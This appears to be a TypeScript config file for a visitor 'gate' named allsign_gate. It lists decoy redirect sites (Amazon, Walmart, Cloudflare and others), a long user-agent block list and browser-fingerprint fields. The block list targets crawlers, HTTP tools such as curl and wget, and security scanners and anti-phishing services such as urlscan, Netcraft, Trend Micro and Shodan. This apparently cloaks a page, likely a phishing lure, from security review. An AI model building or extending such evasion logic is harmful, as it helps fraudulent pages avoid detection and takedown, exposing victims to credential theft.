export const GATE_TOKEN_TTL_MS = 15 * 60 * 1000;
export const GATE_COOKIE_NAME = 'allsign_gate';

export const BOT_REDIRECT_POOL = [
  'https://www.amazon.com/',
  'https://www.cloudflare.com/',
  'https://www.arsenal.com/',
  'https://www.temu.com/',
  'https://www.ebay.com/',
  'https://www.alibaba.com/',
  'https://www.target.com/',
  'https://www.walmart.com/',
];

/** Crawler, scanner, automation, and script-client signatures. */
export const BOT_UA_PATTERNS = [
  'googlebot',
  'google-inspectiontool',
  'adsbot-google',
  'mediapartners-google',
  'apis-google',
  'feedfetcher-google',
  'bingbot',
  'bingpreview',
  'msnbot',
  'slurp',
  'duckduckbot',
  'baiduspider',
  'yandexbot',
  'sogou',
  'exabot',
  'facebot',
  'facebookexternalhit',
  'twitterbot',
  'linkedinbot',
  'applebot',
  'semrushbot',
  'ahrefsbot',
  'mj12bot',
  'dotbot',
  'petalbot',
  'rogerbot',
  'scrapy/',
  'curl/',
  'wget/',
  'python-requests',
  'python-urllib',
  'python/',
  'aiohttp',
  'httpx/',
  'go-http-client',
  'java/',
  'ruby',
  'perl',
  'php/',
  'headlesschrome',
  'headless',
  'phantomjs',
  'selenium',
  'webdriver',
  'puppeteer',
  'playwright',
  'nightmare',
  'cypress',
  'testcafe',
  'zgrab',
  'masscan',
  'nmap',
  'nikto',
  'sqlmap',
  'dirbuster',
  'gobuster',
  'ffuf',
  'nuclei',
  'bytespider',
  'meta-externalagent',
  'gptbot',
  'chatgpt-user',
  'claudebot',
  'anthropic-ai',
  'cohere-ai',
  'archive.org_bot',
  'ia_archiver',
  'spbot',
  'discordbot',
  'telegrambot',
  'whatsapp',
  'pinterestbot',
  'crawler',
  'spider',
  'bot/',
  'bot;',
  'bot ',
  'preview',
  'monitor',
  'scraper',
  'fetcher',
  'hubspot',
  'uptimerobot',
  'pingdom',
  'gtmetrix',
  'lighthouse',
  'pagespeed',
  'validator',
  'postman',
  'insomnia',
  'axios/',
  'node-fetch',
  'undici',
  'libwww-perl',
  'okhttp',
  'apache-httpclient',
  'colly',
  'mechanize',
  'httpclient',
  'rest-client',
  'check_http',
  'zgrab',
  'censys',
  'shodan',
  'nessus',
  'burp',
  'acunetix',
  'netcraft',
  'trendmicro',
  'urlscan',
];

export interface ClientSignals {
  userAgent: string;
  webdriver: boolean;
  languages: string[];
  platform: string;
  vendor: string;
  hardwareConcurrency: number;
  maxTouchPoints: number;
  timezone: string;
  screenWidth: number;
  screenHeight: number;
  outerWidth: number;
  outerHeight: number;
  colorDepth: number;
  touchSupport: boolean;
  pdfViewerEnabled: boolean;
  pluginCount: number;
}
